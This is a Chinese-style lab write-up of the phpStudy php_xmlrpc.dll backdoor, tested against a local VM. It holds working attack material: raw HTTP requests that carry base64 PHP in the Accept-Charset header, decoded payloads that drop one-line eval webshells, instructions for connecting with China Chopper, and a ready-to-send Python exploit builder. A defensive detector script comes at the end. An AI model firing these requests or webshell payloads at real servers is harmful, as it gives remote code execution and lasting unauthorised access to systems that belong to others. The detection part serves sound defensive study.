Vulnerability overview
For background on the phpStudy backdoor vulnerability, see the references at the end of this post.
phpStudy ships the backdoor in the following files (the trojaned build of the php_xmlrpc extension):
- phpStudy2016: php\php-5.2.17\ext\php_xmlrpc.dll and php\php-5.4.45\ext\php_xmlrpc.dll
- phpStudy2018: PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll and PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
Setting up the test environment
Environment
- VMware Workstation 14
- win7 target web server (IP 192.168.43.196)
- win10 attacker (IP 192.168.43.253)
- Burp Suite
- phpstudy2018
Installing phpstudy2018
phpstudy2018 installer download address
The installation steps are not covered here. Once the install succeeds, browse to http://192.168.43.196 to confirm the site is up.
Open C:\PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll in notepad++ and search for eval. The hit shown in the figure below, a PHP eval() call embedded in what should be a compiled extension, confirms that this build carries the backdoor.
Exploiting the backdoor
Intercepting the traffic with Burp Suite shows that a client can submit commands to the server through the Accept-Charset field of the HTTP request header. The value is the base64 encoding of PHP source; the backdoored php_xmlrpc.dll decodes it and hands it to eval(), so the code runs inside the web server's PHP process, with the server's privileges, on any PHP page of the site. According to the public analyses of this backdoor, the decode is only performed when the request also carries Accept-Encoding: gzip,deflate (that exact string, with no space after the comma), which is why the Repeater request below sets that header by hand instead of keeping the browser default.
Writing the webshell
```python
import base64

def b64encode(a):
    # Print the base64 encoding of the PHP source; this is the Accept-Charset value
    print(base64.b64encode(a.encode('utf-8')))

# The one-line webshell inside fwrite() was stripped by the blog's HTML rendering;
# it is restored here from the base64 output below, which decodes to exactly this string.
b64encode(r"""$f =fopen("C:\phpStudy\PHPTutorial\WWW\x.php","w");fwrite($f,"<?php @eval(\$_POST['cmd']); ?>");fclose($f);""")
# Output (from the post):
# b'JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs='
```
Note that the payload writes to C:\phpStudy\PHPTutorial\WWW\x.php; the path must match the actual phpStudy install directory on the target (this lab's DLL was found under C:\PHPTutorial), otherwise fopen() fails and no shell is dropped.
Send the request that writes the webshell from Burp Suite's Repeater module. The full HTTP request is as follows; the Accept-Charset value is the base64 string produced above:
```http
GET / HTTP/1.1
Host: 192.168.43.196
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Charset: JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs=
Accept-Encoding: gzip,deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 2
```
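As an added example (not code from the original post), the following Python script reproduces the request above programmatically: it generates the same webshell-dropping PHP that the post base64-encodes, builds the raw request with both trigger headers, and can send it over a plain socket. The target IP and the C:\phpStudy\PHPTutorial\WWW path are the ones from the post's payload; the requirement that Accept-Encoding be exactly gzip,deflate is taken from the public analyses of the backdoor, not from the post.

```python
"""
Added example (not code from the original post): build the phpStudy
php_xmlrpc.dll backdoor request that the post sends from Burp Repeater.

The backdoor evals the base64-decoded PHP in the Accept-Charset header
when the request also carries Accept-Encoding "gzip,deflate"; that trigger
condition is taken from the public analyses of the backdoor, not from the post.
"""
import base64
import socket

TARGET_HOST = "192.168.43.196"   # the post's win7 target
# Web root used in the post's payload; adjust to the real phpStudy install
# (the post's own lab also shows the install under C:\PHPTutorial).
WWW_ROOT = r"C:\phpStudy\PHPTutorial\WWW"


def webshell_writer(path: str, password: str) -> str:
    """PHP source that drops a one-line eval webshell at `path`.

    Reproduces the post's payload byte for byte. The backslash before $_POST
    stops PHP from interpolating it inside the double-quoted fwrite() argument,
    so the literal text reaches the file.
    """
    shell = "<?php @eval(\\$_POST['%s']); ?>" % password
    return '$f =fopen("%s","w");fwrite($f,"%s");fclose($f);' % (path, shell)


def encode_payload(php_code: str) -> str:
    """Accept-Charset value: base64 of the PHP source, no line breaks."""
    return base64.b64encode(php_code.encode("utf-8")).decode("ascii")


def build_request(host: str, php_code: str, path: str = "/") -> bytes:
    """Raw HTTP/1.1 request carrying both trigger headers.

    Accept-Encoding must be the literal "gzip,deflate" (no space); a browser's
    default "gzip, deflate, br" does not trip the backdoor.
    """
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        "User-Agent: Mozilla/5.0",
        "Accept: text/html,*/*;q=0.8",
        f"Accept-Charset: {encode_payload(php_code)}",
        "Accept-Encoding: gzip,deflate",
        "Connection: close",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def send_raw(host: str, request: bytes, port: int = 80, timeout: float = 5.0) -> bytes:
    """Send the raw request over a plain TCP socket and return the response bytes."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    php = webshell_writer(WWW_ROOT + r"\x.php", "cmd")
    req = build_request(TARGET_HOST, php)
    print(req.decode("ascii"))
    # Uncomment in the lab to fire it; afterwards http://192.168.43.196/x.php
    # accepts PHP in the POST parameter "cmd".
    # print(send_raw(TARGET_HOST, req)[:300].decode("latin-1"))
```

Because the backdoor runs whatever PHP it is handed, the same builder works for any one-off command (for example `phpinfo();` or `system('whoami');`) without dropping a file; the webshell is only a convenience for follow-up access with 菜刀.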
Two one-line trojans
The two payloads, decoded from their base64 form with atob() in a browser console (the webshell text inside each was stripped by the blog's HTML rendering and is restored here from the base64):
```text
atob('c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs=')
// decodes to:
system('echo ^<?php @eval($_POST["shell"])?^>>PHPTutorial\WWW\shell.php');

atob('JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs=')
// decodes to:
$f =fopen("C:\phpStudy\PHPTutorial\WWW\x.php","w");fwrite($f,"<?php @eval(\$_POST['cmd']); ?>");fclose($f);
```
The first goes through cmd.exe via system(): the ^ escapes the < and > characters so echo prints them literally, the final unescaped > redirects the line into shell.php, and the relative path resolves against the PHP process's working directory (the phpStudy root). The second uses PHP's own file functions with an absolute path and needs no shell. Both drop a one-line eval webshell; the POST parameter name (shell or cmd) is the password that 菜刀 will use.
Connect to the dropped shell with 菜刀 (China Chopper): the URL is http://192.168.43.196/x.php (or shell.php) and the password is the POST parameter name from the payload, cmd for x.php and shell for shell.php.
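The post checks for the backdoor by hand (searching the DLL for eval) and drives it from Burp. As an added example (not code from the original post), the following Python script automates both sides of that: a byte search over a php_xmlrpc.dll image, and a check over captured HTTP requests that flags the trigger header pair and recovers the PHP it carries. The sample DLL bytes and request texts are constructed for this example; the gzip,deflate trigger condition comes from the public analyses of the backdoor rather than from the post.

```python
"""
Added example (not code from the original post): two checks for the phpStudy
php_xmlrpc.dll backdoor, one on disk and one on the wire.

- on disk: the post verifies the backdoor by opening php_xmlrpc.dll in an
  editor and searching for "eval"; check_dll_bytes() does the same search
  over the raw file bytes.
- on the wire: the backdoor fires on Accept-Encoding "gzip,deflate" plus a
  base64-encoded PHP payload in Accept-Charset (trigger condition taken
  from the public analyses), so that header pair with a decodable
  Accept-Charset is the detection signal.

All sample bytes and requests below are constructed for this example.
"""
import base64
import binascii
import re

DLL_MARKER = b"eval("           # the string the post searches for in the DLL
PHP_HINT = re.compile(r"\$_(POST|GET|REQUEST)|\b(eval|system|fopen|fwrite)\(")

# Constructed stand-ins for a DLL image: a clean build carries only
# xmlrpc symbols, the trojaned one embeds a PHP eval() template.
SAMPLE_CLEAN = b"MZ\x90\x00" + b"xmlrpc_encode\x00xmlrpc_decode\x00"
SAMPLE_BACKDOORED = b"MZ\x90\x00" + b"\x00" * 32 + b"@eval(%s('%s'));" + b"\x00" * 8

PAYLOAD_B64 = (  # the Accept-Charset value used in the post
    "JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7"
    "ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs="
)
BENIGN_REQUEST = (   # constructed: what a browser normally sends
    "GET / HTTP/1.1\r\nHost: 192.168.43.196\r\n"
    "Accept-Charset: utf-8, iso-8859-1;q=0.5\r\n"
    "Accept-Encoding: gzip, deflate, br\r\nConnection: close\r\n\r\n"
)
BACKDOOR_REQUEST = (  # constructed: the post's trigger headers
    "GET / HTTP/1.1\r\nHost: 192.168.43.196\r\n"
    "Accept-Charset: " + PAYLOAD_B64 + "\r\n"
    "Accept-Encoding: gzip,deflate\r\nConnection: close\r\n\r\n"
)


def check_dll_bytes(data: bytes) -> int:
    """Offset of the first 'eval(' in a DLL image, or -1 when absent."""
    return data.find(DLL_MARKER)


def check_dll_file(path: str) -> int:
    """Same check against a file on disk, e.g. the ext\\php_xmlrpc.dll paths the post lists."""
    with open(path, "rb") as fh:
        return check_dll_bytes(fh.read())


def parse_headers(raw: str) -> dict:
    """Lower-cased header name -> value for one raw HTTP request."""
    headers = {}
    for line in raw.split("\r\n")[1:]:   # skip the request line
        if not line:                     # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def inspect_request(raw: str):
    """Decoded PHP payload if `raw` is a backdoor trigger request, else None."""
    h = parse_headers(raw)
    if h.get("accept-encoding") != "gzip,deflate":
        return None                      # trigger header not present
    try:
        decoded = base64.b64decode(h.get("accept-charset", ""), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None                      # a genuine charset list is not valid base64
    return decoded if PHP_HINT.search(decoded) else None


if __name__ == "__main__":
    for name, req in ("benign", BENIGN_REQUEST), ("backdoor", BACKDOOR_REQUEST):
        print(name, "->", inspect_request(req))
    print("marker offset in sample DLL:", check_dll_bytes(SAMPLE_BACKDOORED))
```

Feed inspect_request() full captured requests (Burp history, a WAF or reverse-proxy log that records headers, or requests reassembled from a pcap): the default Apache combined log format does not record Accept-Charset or Accept-Encoding, so this trigger leaves no trace in a stock access.log.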
References
- Phpstudy vulnerability reproduction and exploitation
- poc